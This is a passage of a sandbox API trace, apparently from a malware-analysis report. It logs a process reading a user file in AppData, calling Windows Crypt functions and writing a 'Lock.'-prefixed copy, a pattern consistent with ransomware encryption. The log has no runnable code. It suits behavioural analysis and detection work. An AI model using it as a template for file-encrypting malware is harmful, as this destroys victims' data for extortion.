hHeap=0x970000) returned 1 [0231.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0231.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0231.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0231.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0231.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0231.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0231.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0231.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0231.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0231.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0231.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0231.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0231.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0231.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0231.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0231.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0231.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0231.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0231.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0231.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0231.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0231.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0231.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0231.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0231.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0231.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0231.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0231.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977de8 | out: hHeap=0x970000) returned 1 [0231.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0231.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0231.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0231.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0231.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0231.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0231.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0231.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0231.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0231.723] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0231.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0231.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0231.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0231.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0231.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0231.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0231.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0231.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0231.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0231.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0231.723] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0231.723] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0231.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0231.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0231.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0231.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0231.724] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0231.724] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.724] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.724] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0231.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f040a8 | out: hHeap=0x970000) returned 1 [0231.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0231.724] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0231.725] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0231.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0231.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e698c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0231.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0231.725] CryptDestroyHash (hHash=0xa876d0) returned 1 [0231.725] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.726] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.726] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0231.726] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0231.726] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.729] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/GxeLAc.mp3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\gxelac.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0231.729] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.729] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0231.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0231.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0231.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0231.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0231.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0231.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0231.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0231.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0231.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0231.730] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0231.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0231.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0231.730] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0231.730] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0231.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0231.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0231.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0231.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0231.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0231.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0231.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0231.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0231.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0231.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0231.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e56588 [0231.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0231.731] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0231.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0231.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0231.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0231.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04810 [0231.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0231.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0231.732] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.GxeLAc.mp3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.gxelac.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0231.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0231.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0231.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0231.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0231.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0231.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0231.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0231.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0231.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0231.770] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0231.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0231.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0231.771] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0231.771] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0231.771] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0231.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0231.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0231.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0231.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0231.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0231.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0231.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0231.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0231.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0231.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0231.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0231.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0231.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0231.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0231.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe57020 [0231.775] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0231.775] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0x2a33, lpOverlapped=0x0) returned 1 [0231.777] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0231.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0231.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0231.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0231.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0231.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2a33) returned 0x3bf0dd8 [0231.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe57020 | out: hHeap=0x970000) returned 1 [0231.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0231.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0231.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0231.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0231.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0231.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0231.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0231.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0231.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2a33) returned 0x3bf3818 [0231.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0dd8 | out: hHeap=0x970000) returned 1 [0231.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0231.781] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0231.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0231.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0231.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0231.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0231.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2a33) returned 0x3bf0dd8 [0231.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0231.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0dd8 | out: hHeap=0x970000) returned 1 [0231.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0231.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0231.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0231.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0231.781] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0231.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0231.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0231.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0231.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0231.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0231.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0231.782] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0231.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f040e0 [0231.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0231.782] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0231.782] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0231.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0231.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0231.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0231.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0231.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f698 [0231.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0231.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0231.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0231.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0231.783] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0231.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0231.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0231.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0231.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0231.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0231.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0231.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0231.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 